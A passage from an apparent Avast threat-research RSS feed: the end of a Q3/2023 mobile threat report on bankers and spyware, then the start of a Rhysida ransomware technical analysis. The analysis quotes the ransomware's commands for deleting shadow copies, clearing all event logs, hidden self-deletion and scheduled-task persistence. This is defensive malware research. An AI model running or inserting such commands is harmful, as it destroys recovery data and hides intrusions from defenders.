  6429. <p>Turkey continues to hold top place with the most protected users, closely followed by Spain, France, and the UK. Most of the banker focus appears to be on Europe, with a few exceptions such as Brazil, Japan, and Australia.</p>
  6430.  
  6431.  
  6432. <div class="wp-block-image">
  6433. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Bankers-Risk-map-1024x639.png" alt="" class="wp-image-7798" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Bankers-Risk-map-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Bankers-Risk-map-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Bankers-Risk-map-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Bankers-Risk-map-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Bankers-Risk-map-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Global risk ratio for mobile bankers in Q3/2023</em>&nbsp;&nbsp;</figcaption></figure></div>
  6434.  
  6435.  
  6436. <h3 class="wp-block-heading">Spyware Telegram Mods Are on the Rise&nbsp;</h3>
  6437.  
  6438.  
  6439.  
  6440. <p><em>Spyware is used to spy on unsuspecting victims with the intent of extracting personal information such as messages, photos, location, or login details. It uses fake adverts, phishing messages, and modifications of popular applications to spread and harvest user information. State backed commercial spyware is becoming more prevalent and is used to target individuals with 0-day exploits.</em>&nbsp;</p>
  6441.  
  6442.  
  6443.  
  6444. <p>Spyware presence has slightly declined this quarter as Spymax maintains its top spot among the spyware strains with SexInfoSteal and FaceStealer trailing closely behind. New additions to the spyware family this quarter include several new trojanized modifications of popular messenger applications and SpyNote making another appearance. We note the spread of a fake spyware missile alert app in Israel and Spyloans continue their reign as several new samples have been spotted on the PlayStore.&nbsp;&nbsp;</p>
  6445.  
  6446.  
  6447.  
  6448. <p>Another version of <a href="https://www.mcafee.com/blogs/other-blogs/mcafee-labs/android-spynote-attacks-electric-and-water-public-utility-users-in-japan/" target="_blank" rel="noreferrer noopener">SpyNote/Spymax</a> was used as part of a short campaign targeting users in Japan with fake SMS messages about unpaid utility or water bills. Conveying a sense of urgency, these messages led victims to a series of phishing sites which downloaded SpyNote onto their devices. Once installed, the malware would direct users to open settings and enable the accessibility service, allowing it to install further malware and hide itself on the device. It then spied on the victim’s personal data and was able to access authenticator apps on the device and steal social media credentials.</p>
  6449.  
  6450.  
  6451. <div class="wp-block-image">
  6452. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="513" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-SpyNote-config-513x1024.png" alt="" class="wp-image-7799" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-SpyNote-config-513x1024.png 513w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-SpyNote-config-150x300.png 150w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/1.-SpyNote-config.png 548w" sizes="(max-width: 513px) 100vw, 513px" /><figcaption class="wp-element-caption"><em>The SpyNote config containing various settings and checks, such as having Accessibility enabled</em>&nbsp;</figcaption></figure></div>
  6453.  
  6454.  
  6455. <p>In relation to the recent escalating situation between Israel and Palestine, it is worth highlighting a <a href="https://blog.cloudflare.com/malicious-redalert-rocket-alerts-application-targets-israeli-phone-calls-sms-and-user-information/" target="_blank" rel="noreferrer noopener">spyware Red Alert</a> missile warning app that was distributed through a phishing website. The original app is used by many in Israel to monitor missile warnings. The fake Red Alert spyware app contained identical features with added abilities that allow it to spy on its victims. These included extracting the call log, SMS lists, location, and emails, among others. The malware also features anti-debugging and anti-emulation checks that attempt to prevent detection. While not documented, it is possible this malware could also be used to deliver fake warning messages, as has happened with <a href="https://cybernews.com/cyber-war/israel-redalert-breached-anonghost-hamas/" target="_blank" rel="noreferrer noopener">other breached missile warning apps.</a></p>
  6456.  
  6457.  
  6458. <div class="wp-block-image">
  6459. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1021" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-RedAlert-fake-website-1021x1024.jpg" alt="" class="wp-image-7801" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-RedAlert-fake-website-1021x1024.jpg 1021w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-RedAlert-fake-website-300x300.jpg 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-RedAlert-fake-website-150x150.jpg 150w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-RedAlert-fake-website-768x770.jpg 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-RedAlert-fake-website-214x214.jpg 214w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-RedAlert-fake-website-344x344.jpg 344w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-RedAlert-fake-website-442x442.jpg 442w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/2.-RedAlert-fake-website.jpg 1262w" sizes="(max-width: 1021px) 100vw, 1021px" /><figcaption class="wp-element-caption"><em>Phishing site impersonating the original RedAlert missile warning website that downloads the spyware payload</em></figcaption></figure></div>
  6460.  
  6461.  
  6462. <p>As noted in past quarterly reports, mods for WhatsApp, Telegram and Signal are becoming a more popular target for threat actors. We observed another case of <a href="https://securelist.com/trojanized-telegram-mod-attacking-chinese-users/110482/" target="_blank" rel="noreferrer noopener">Trojanized Telegram mods</a> discovered on the PlayStore, this time targeting Chinese-speaking victims. This version looks like the Telegram app at face value, but harvests user information, messages, calls and contact lists in the background. These are then exfiltrated to a cloud service to be further used by malicious actors. Similarly, <a href="https://www.welivesecurity.com/en/eset-research/badbazaar-espionage-tool-targets-android-users-trojanized-signal-telegram-apps/" target="_blank" rel="noreferrer noopener">BadBazaar</a> samples have been spread through trojanized Signal and Telegram apps. Using fake websites to lure victims in, this strain appears to be targeting the Uyghur population. It contains a similar spyware feature set to the trojanized Telegram mods. These malicious modifications are here to stay, and users are advised to avoid modifications of popular messaging apps.</p>
  6463.  
  6464.  
  6465. <div class="wp-block-image">
  6466. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="694" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3.-FlyGram-splash-screen-694x1024.jpg" alt="" class="wp-image-7802" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3.-FlyGram-splash-screen-694x1024.jpg 694w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3.-FlyGram-splash-screen-203x300.jpg 203w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/3.-FlyGram-splash-screen.jpg 767w" sizes="(max-width: 694px) 100vw, 694px" /><figcaption class="wp-element-caption"><em>Splash screen of the fake FlyGram mod that contains BadBazaar spyware</em></figcaption></figure></div>
  6467.  
  6468.  
  6469. <p>Spyloan applications continue to spread on the PlayStore. As <a href="https://www.zimperium.com/blog/moneymonger-predatory-loan-scam-campaigns-move-to-flutter/" target="_blank" rel="noreferrer noopener">reported by Zimperium</a>, these apps remain mostly unchanged and offer loans to unsuspecting victims in various Asian and South American countries. Once the user installs the application, it requests various invasive permissions under the guise of a credit check. If the victim grants these, the actors behind the spy loans harvest victim data such as messages, contact lists and photos, to name a few. These are then used to extort victims, often into paying more than the agreed amount, and the harassment may continue even after the debt is paid. Users are advised to avoid unofficial sources of loans to avoid this type of extortion.&nbsp;&nbsp;</p>
  6470.  
  6471.  
  6472.  
  6473. <p>This quarter brings a slight decrease in the prevalence of spyware in the mobile sector. While several strains of malicious mods snuck onto the PlayStore, we see an overall decrease in activity and spread of spyware this quarter.</p>
  6474.  
  6475.  
  6476. <div class="wp-block-image">
  6477. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="404" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Spyware-daily-hits-1024x404.png" alt="" class="wp-image-7803" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Spyware-daily-hits-1024x404.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Spyware-daily-hits-300x118.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Spyware-daily-hits-768x303.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Spyware-daily-hits-1536x606.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/4.-Spyware-daily-hits-2048x808.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Global risk ratio of mobile spyware in Q2/2023 and Q3/2023</em></figcaption></figure></div>
  6478.  
  6479.  
  6480. <p>Brazil continues to have the highest number of protected users this quarter, followed by Turkey, US, and India. Yemen has the highest risk of encountering mobile malware in comparison to the rest of the world.</p>
  6481.  
  6482.  
  6483. <div class="wp-block-image">
  6484. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="639" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Spyware-risk-map-1024x639.png" alt="" class="wp-image-7804" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Spyware-risk-map-1024x639.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Spyware-risk-map-300x187.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Spyware-risk-map-768x479.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Spyware-risk-map-1536x958.png 1536w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/5.-Spyware-risk-map-2048x1278.png 2048w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption"><em>Global risk ratio for mobile spyware in Q3/2023</em></figcaption></figure></div>
  6485.  
  6486.  
  6487. <p class="has-text-align-right"><em>Jakub Vávra, Malware Analyst</em></p>
  6488.  
  6489.  
  6490.  
  6491. <h2 class="wp-block-heading">Acknowledgements / Credits</h2>
  6492.  
  6493.  
  6494.  
  6495. <div class="wp-block-columns is-layout-flex wp-container-core-columns-layout-4 wp-block-columns-is-layout-flex">
  6496. <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
  6497. <h6 class="wp-block-heading">Malware researchers</h6>
  6498.  
  6499.  
  6500.  
  6501. <p>Adolf Středa<br>Alexej Savčin<br>Bohumír Fajt<br>Branislav Kramár<br>David Álvarez<br>Igor Morgenstern<br>Jakub Křoustek<br>Jakub Vávra<br>Jan Rubín<br>Jan Vojtěšek<br>Ladislav Zezula<br>Luigino Camastra<br>Luis Corrons<br>Martin Chlumecký<br>Matěj Krčma<br>Michal Salát<br>Ondřej Mokoš&nbsp;</p>
  6502. </div>
  6503.  
  6504.  
  6505.  
  6506. <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
  6507. <h6 class="wp-block-heading">Data analysts</h6>
  6508.  
  6509.  
  6510.  
  6511. <p>Pavol Plaskoň<br>Filip Husák<br>Lukáš Zobal&nbsp;</p>
  6512. </div>
  6513.  
  6514.  
  6515.  
  6516. <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
  6517. <h6 class="wp-block-heading">Communications</h6>
  6518.  
  6519.  
  6520.  
  6521. <p>Brittany Posey<br>Emma McGowan&nbsp;</p>
  6522. </div>
  6523. </div>
  6524. <p>The post <a href="https://decoded.avast.io/threatresearch/avast-q3-2023-threat-report/">Avast Q3/2023 Threat Report</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
  6525. ]]></content:encoded>
  6526. <enclosure url="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Trump.mp4" length="2291110" type="video/mp4" />
  6527. <enclosure url="https://decoded.avast.io/wp-content/uploads/sites/2/2023/11/Musk.mp4" length="2781524" type="video/mp4" />
  6528.  
  6529. </item>
  6530. <item>
  6531. <title>Rhysida Ransomware Technical Analysis</title>
  6532. <link>https://decoded.avast.io/threatresearch/rhysida-ransomware-technical-analysis/?utm_source=rss&#038;utm_medium=rss&#038;utm_campaign=rhysida-ransomware-technical-analysis</link>
  6533. <dc:creator><![CDATA[Threat Research Team]]></dc:creator>
  6534. <pubDate>Thu, 26 Oct 2023 11:31:10 +0000</pubDate>
  6535. <category><![CDATA[PC]]></category>
  6536. <category><![CDATA[decryptor]]></category>
  6537. <category><![CDATA[decryptors]]></category>
  6538. <category><![CDATA[ransomware]]></category>
  6539. <guid isPermaLink="false">https://decoded.avast.io/?p=7747</guid>
  6540.  
  6541. <description><![CDATA[<p>Technical analysis of Rhysida Ransomware family that emerged in the Q2 of 2023</p>
  6542. <p>The post <a href="https://decoded.avast.io/threatresearch/rhysida-ransomware-technical-analysis/">Rhysida Ransomware Technical Analysis</a> appeared first on <a href="https://decoded.avast.io">Avast Threat Labs</a>.</p>
  6543. ]]></description>
  6544. <content:encoded><![CDATA[
  6545. <p>Rhysida is a new ransomware strain that emerged in the second quarter of 2023. The first mention of the Rhysida ransomware was <a href="https://twitter.com/malwrhunterteam/status/1658829565215604738" target="_blank" rel="noreferrer noopener">in May 2023</a> by <a href="https://twitter.com/malwrhunterteam" target="_blank" rel="noreferrer noopener">MalwareHunterTeam</a> (sample’s timestamp is May 16, 2023). As of Oct 12, the ransomware’s leak site contains a list of over 50 attacked organizations of all types, including government, healthcare, and IT.</p>
  6546.  
  6547.  
  6548. <div class="wp-block-image">
  6549. <figure class="aligncenter size-large"><img loading="lazy" decoding="async" width="859" height="1024" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-00-leak-site-859x1024.png" alt="" class="wp-image-7748" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-00-leak-site-859x1024.png 859w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-00-leak-site-252x300.png 252w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-00-leak-site-768x916.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-00-leak-site.png 1015w" sizes="(max-width: 859px) 100vw, 859px" /><figcaption class="wp-element-caption">Screenshot of the Rhysida data leak site as of Oct 16, 2023&nbsp;</figcaption></figure></div>
  6550.  
  6551.  
  6552. <p>Victims of the Rhysida ransomware can contact Avast experts directly at <code>decryptors-at-avast-dot-com</code> for a free consultation about how to mitigate damage caused by the attack.&nbsp;</p>
  6553.  
  6554.  
  6555.  
  6556. <h2 class="wp-block-heading">Analysis of the Rhysida encryptor&nbsp;</h2>
  6557.  
  6558.  
  6559.  
  6560. <p>The Rhysida encryptor comes as a 32-bit or 64-bit Windows PE file, compiled by MinGW GNU version 6.3.0 and linked by the GNU linker v 2.30. The first public version comes as a debug version, which makes its analysis easier.&nbsp;</p>
  6561.  
  6562.  
  6563.  
  6564. <p>For cryptographic operations, Rhysida uses the <a href="https://github.com/libtom/libtomcrypt" target="_blank" rel="noreferrer noopener">LibTomCrypt</a> library version <a href="https://github.com/libtom/libtomcrypt/releases/tag/v1.18.1" target="_blank" rel="noreferrer noopener">1.18.1</a>. For multi-threading and synchronization, Rhysida uses the <a href="https://github.com/ldx/winpthreads" target="_blank" rel="noreferrer noopener">winpthreads</a> library. The <a href="https://github.com/libtom/libtomcrypt/blob/develop/src/prngs/chacha20.c" target="_blank" rel="noreferrer noopener">ChaCha20 pseudo-random number generator</a> is used for generating random values, such as the AES encryption key, the AES initialization vector and the random padding for RSA-OAEP encryption. The public RSA key is hard-coded in the binary (ASN.1-encoded) and loaded using the <a href="https://github.com/libtom/libtomcrypt/blob/7e863d21429f94ed6a720e24499a12a3f852bb31/src/pk/rsa/rsa_import.c#L85" target="_blank" rel="noreferrer noopener">rsa_import</a> function. Each sample has a different embedded RSA key.&nbsp;</p>
  6565.  
  6566.  
  6567.  
  6568. <p>The encryptor executable supports the following command line arguments:&nbsp;</p>
  6569.  
  6570.  
  6571.  
  6572. <ul>
  6573. <li><code>-d</code> Specifies a directory name to encrypt. If omitted, all drives (identified by letters) are encrypted&nbsp;</li>
  6574.  
  6575.  
  6576.  
  6577. <li><code>-sr</code> Enables self-remove after file encryption&nbsp;</li>
  6578.  
  6579.  
  6580.  
  6581. <li><code>-nobg</code> Disables setting desktop background&nbsp;</li>
  6582.  
  6583.  
  6584.  
  6585. <li><code>-S</code> When present, Rhysida will create a scheduled task, executing at OS startup under the System account&nbsp;</li>
  6586.  
  6587.  
  6588.  
  6589. <li><code>-md5</code> When present, Rhysida will calculate the MD5 hash of each file before it is encrypted. However, this feature is not fully implemented yet &#8211; the MD5 is calculated, but it’s not used anywhere later.&nbsp;</li>
  6590. </ul>
  6591.  
  6592.  
  6593.  
  6594. <p>When executed, the encryptor queries the number of processors in the system. This value serves for:&nbsp;</p>
  6595.  
  6596.  
  6597.  
  6598. <ul>
  6599. <li>Allocating random number generators (one per processor)&nbsp;</li>
  6600.  
  6601.  
  6602.  
  6603. <li>Creating <code>Encryptor</code> threads (one per processor)&nbsp;</li>
  6604. </ul>
  6605.  
  6606.  
  6607. <div class="wp-block-image">
  6608. <figure class="aligncenter size-full"><img loading="lazy" decoding="async" width="787" height="403" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-01-processor-count.png" alt="" class="wp-image-7749" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-01-processor-count.png 787w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-01-processor-count-300x154.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-01-processor-count-768x393.png 768w" sizes="(max-width: 787px) 100vw, 787px" /><figcaption class="wp-element-caption">Initialization for multi-threaded encryption&nbsp;</figcaption></figure></div>
  6609.  
  6610.  
  6611. <p>Furthermore, Rhysida creates a <code>File Enumerator</code> thread, which searches all available disk drives by letter. Binaries built prior to July 2023 enumerate drives in normal order (from A: to Z:); binaries built after July 1<sup>st</sup> enumerate drives in reverse order (from Z: to A:).&nbsp;</p>
  6612.  
  6613.  
  6614.  
  6615. <p>The <code>File Enumerator</code> thread searches for files to encrypt and puts them into a synchronized list, ready to be picked up by one of the <code>Encryptor</code> threads. Files in system-critical folders, and files necessary to run the operating system and programs, are excluded from encryption.&nbsp;</p>
  6616.  
  6617.  
  6618.  
  6619. <p>List of skipped directories:&nbsp;</p>
  6620.  
  6621.  
  6622.  
  6623. <div class="wp-block-columns is-layout-flex wp-container-core-columns-layout-5 wp-block-columns-is-layout-flex">
  6624. <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
  6625. <ul>
  6626. <li>/$Recycle.Bin&nbsp;</li>
  6627.  
  6628.  
  6629.  
  6630. <li>/Boot&nbsp;</li>
  6631.  
  6632.  
  6633.  
  6634. <li>/Documents and Settings&nbsp;</li>
  6635.  
  6636.  
  6637.  
  6638. <li>/PerfLogs&nbsp;</li>
  6639.  
  6640.  
  6641.  
  6642. <li>/Program Files&nbsp;</li>
  6643.  
  6644.  
  6645.  
  6646. <li>/Program Files (x86)</li>
  6647. </ul>
  6648. </div>
  6649.  
  6650.  
  6651.  
  6652. <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
  6653. <ul>
  6654. <li>/ProgramData&nbsp;</li>
  6655.  
  6656.  
  6657.  
  6658. <li>/Recovery&nbsp;</li>
  6659.  
  6660.  
  6661.  
  6662. <li>/System Volume Information&nbsp;&nbsp;</li>
  6663.  
  6664.  
  6665.  
  6666. <li>/Windows&nbsp;</li>
  6667.  
  6668.  
  6669.  
  6670. <li>/$RECYCLE.BIN</li>
  6671. </ul>
  6672. </div>
  6673. </div>
  6674.  
  6675.  
  6676.  
  6678.  
  6679.  
  6680.  
  6681. <p>List of skipped file types:</p>
  6682.  
  6683.  
  6684.  
  6685. <div class="wp-block-columns is-layout-flex wp-container-core-columns-layout-6 wp-block-columns-is-layout-flex">
  6686. <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
  6687. <ul>
  6688. <li>.bat&nbsp;</li>
  6689.  
  6690.  
  6691.  
  6692. <li>.bin&nbsp;</li>
  6693.  
  6694.  
  6695.  
  6696. <li>.cab&nbsp;</li>
  6697.  
  6698.  
  6699.  
  6700. <li>.cd&nbsp;</li>
  6701.  
  6702.  
  6703.  
  6704. <li>.com&nbsp;</li>
  6705.  
  6706.  
  6707.  
  6708. <li>.cur&nbsp;</li>
  6709.  
  6710.  
  6711.  
  6712. <li>.dagaba&nbsp;</li>
  6713.  
  6714.  
  6715.  
  6716. <li>.diagcfg&nbsp;</li>
  6717.  
  6718.  
  6719.  
  6720. <li>.diagpkg&nbsp;</li>
  6721. </ul>
  6722. </div>
  6723.  
  6724.  
  6725.  
  6726. <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
  6727. <ul>
  6728. <li>.drv&nbsp;</li>
  6729.  
  6730.  
  6731.  
  6732. <li>.dll&nbsp;</li>
  6733.  
  6734.  
  6735.  
  6736. <li>.exe&nbsp;</li>
  6737.  
  6738.  
  6739.  
  6740. <li>.hlp&nbsp;</li>
  6741.  
  6742.  
  6743.  
  6744. <li>.hta&nbsp;</li>
  6745.  
  6746.  
  6747.  
  6748. <li>.ico&nbsp;</li>
  6749.  
  6750.  
  6751.  
  6752. <li>.lnk&nbsp;</li>
  6753.  
  6754.  
  6755.  
  6756. <li>.msi&nbsp;</li>
  6757.  
  6758.  
  6759.  
  6760. <li>.ocx</li>
  6761. </ul>
  6762. </div>
  6763.  
  6764.  
  6765.  
  6766. <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow">
  6767. <ul>
  6768. <li>.ps1&nbsp;</li>
  6769.  
  6770.  
  6771.  
  6772. <li>.psm1&nbsp;</li>
  6773.  
  6774.  
  6775.  
  6776. <li>.scr&nbsp;</li>
  6777.  
  6778.  
  6779.  
  6780. <li>.sys&nbsp;</li>
  6781.  
  6782.  
  6783.  
  6784. <li>.ini&nbsp;</li>
  6785.  
  6786.  
  6787.  
  6788. <li>Thumbs.db&nbsp;</li>
  6789.  
  6790.  
  6791.  
  6792. <li>.url&nbsp;</li>
  6793.  
  6794.  
  6795.  
  6796. <li>.iso&nbsp;</li>
  6797. </ul>
  6798. </div>
  6799. </div>
  6800.  
  6801.  
  6802.  
  6803. <p>Additionally, the ransom note file, usually named <code>CriticalBreachDetected.pdf</code>, is excluded from the list of encrypted files. The PDF content of the ransom note file is hard-coded in the binary and is dropped into each folder. The following picture shows an example of the ransom note from a September version of the ransomware:</p>
  6804.  
  6805.  
  6806.  
  6807. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="776" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-02-ranson-note-1024x776.png" alt="" class="wp-image-7752" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-02-ranson-note-1024x776.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-02-ranson-note-300x227.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-02-ranson-note-768x582.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-02-ranson-note.png 1236w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  6808.  
  6809.  
  6810.  
  6811. <p>In addition to dropping the ransom note, if enabled in the configuration, Rhysida generates a JPEG picture which is stored in <code>C:/Users/Public/bg.jpg</code>. Earlier versions of the ransomware generated the image with unwanted artifacts, which was fixed in later builds of Rhysida. The following picture shows an example of such a JPEG:&nbsp;</p>
  6812.  
  6813.  
  6814.  
  6815. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="428" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-03-desktop-background-1024x428.png" alt="" class="wp-image-7753" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-03-desktop-background-1024x428.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-03-desktop-background-300x125.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-03-desktop-background-768x321.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-03-desktop-background.png 1431w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  6816.  
  6817.  
  6818.  
  6819. <p>The picture is set as the desktop background on the infected device. For that purpose, a set of calls to an external process via <code>system</code> (a C equivalent of CreateProcess) is used:&nbsp;</p>
  6820.  
  6821.  
  6822.  
  6823. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="277" src="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-03-set-desktop-background-1024x277.png" alt="" class="wp-image-7754" srcset="https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-03-set-desktop-background-1024x277.png 1024w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-03-set-desktop-background-300x81.png 300w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-03-set-desktop-background-768x208.png 768w, https://decoded.avast.io/wp-content/uploads/sites/2/2023/10/rhysida-03-set-desktop-background.png 1371w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  6824.  
  6825.  
  6826.  
  6827. <p>Rhysida may or may not (depending on the configuration and binary version) execute additional actions, including:</p>
  6828.  
  6829.  
  6830.  
  6831. <ul>
  6832. <li>Delete shadow copies using:&nbsp;<br>&nbsp;<br><code>cmd.exe /c vssadmin.exe Delete Shadows /All /Quiet</code>&nbsp;<br>&nbsp;</li>
  6833.  
  6834.  
  6835.  
  6836. <li>Delete the event logs with this command:&nbsp;<br>&nbsp;<br><code>cmd.exe /c for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"</code><br></li>
  6837. </ul>
  6838.  
  6839.  
  6840.  
  6841. <ul>
  6842. <li>Delete itself via PowerShell command&nbsp;<br>&nbsp;<br><code>cmd.exe /c start powershell.exe -WindowStyle Hidden -Command Sleep -Milliseconds 500; Remove-Item -Force -Path "%BINARY_NAME%" -ErrorAction SilentlyContinue;</code>&nbsp;<br>&nbsp;</li>
  6843.  
  6844.  
  6845.  
  6846. <li>(Re-)create a scheduled task on Windows startup:&nbsp;<br>&nbsp;<br><code>cmd.exe /c start powershell.exe -WindowStyle Hidden -Command "Sleep -Milliseconds 1000; schtasks /end /tn Rhsd; schtasks /delete /tn Rhsd /f; schtasks /create /sc ONSTART /tn Rhsd /tr \"</code>&nbsp;<br>&nbsp;</li>
  6847.  
  6848.  
  6849.  
  6850. <li>Remove scheduled task using:&nbsp;<br>&nbsp;<br><code>cmd.exe /c start powershell.exe -WindowStyle Hidden -Command "Sleep -Milliseconds 1000; schtasks /delete /tn Rhsd /f;"</code>&nbsp;</li>
  6851. </ul>
  6852.  
  6853.  
  6854.  
  6855. <h2 class="wp-block-heading">How Rhysida encrypts files&nbsp;</h2>
  6856.  
  6857.  
  6858.  
  6859. <p>To achieve the highest possible encryption speed, Rhysida’s encryption is performed by multiple <code>Encryptor</code> threads. Files bigger than 1 MB (1048576 bytes) are divided into 2-4 blocks and only 1 MB of data is encrypted from each block. The following table shows an overview of the number of blocks, the size of one block and the length of the encrypted part:&nbsp;</p>
  6860.  
  6861.  
  6862.  
  6863. <figure class="wp-block-table"><table><tbody><tr><td class="has-text-align-center" data-align="center">File Size</td><td class="has-text-align-center" data-align="center">Block Count</td><td class="has-text-align-center" data-align="center">Block Size</td><td class="has-text-align-center" data-align="center">Encrypted Length</td></tr><tr><td class="has-text-align-center" data-align="center">0 – 1 MB</td><td class="has-text-align-center" data-align="center">1</td><td class="has-text-align-center" data-align="center">(whole file)</td><td class="has-text-align-center" data-align="center">(whole block)</td></tr><tr><td class="has-text-align-center" data-align="center">1 – 2 MB&nbsp;</td><td class="has-text-align-center" data-align="center">1</td><td class="has-text-align-center" data-align="center">(whole file)</td><td class="has-text-align-center" data-align="center">1048576</td></tr><tr><td class="has-text-align-center" data-align="center">2 – 3 MB</td><td class="has-text-align-center" data-align="center">2</td><td class="has-text-align-center" data-align="center">File Size / 2</td><td class="has-text-align-center" data-align="center">1048576</td></tr><tr><td class="has-text-align-center" data-align="center">3 – 4 MB&nbsp;</td><td class="has-text-align-center" data-align="center">3</td><td class="has-text-align-center" data-align="center">File Size / 3</td><td class="has-text-align-center" data-align="center">1048576</td></tr><tr><td class="has-text-align-center" data-align="center">&gt; 4MB&nbsp;</td><td class="has-text-align-center" data-align="center">4</td><td class="has-text-align-center" data-align="center">File Size / 4</td><td class="has-text-align-center" data-align="center">1048576</td></tr></tbody></table><figcaption class="wp-element-caption">Table 1: File sizes, block counts, block lengths and encrypted lengths.&nbsp;</figcaption></figure>
  6864.  
  6865.  
  6866.  
  6867. <p>Multiple steps are performed to encrypt a file:&nbsp;</p>
  6868.  
  6869.  
  6870.  
  6871. <ul>
  6872. <li>The file is renamed to have the “.rhysida” extension.&nbsp;</li>
  6873.  
  6874.  
  6875.  
  6876. <li>The file size is obtained by the sequence below. Note that earlier versions of the ransomware contain a bug, which causes the upper 32 bits of the file size to be ignored. In later versions of Rhysida, this bug is fixed.&nbsp;</li>
  6877. </ul>
  6878.  
  6879.  
  6880. <div class="wp-block-image">
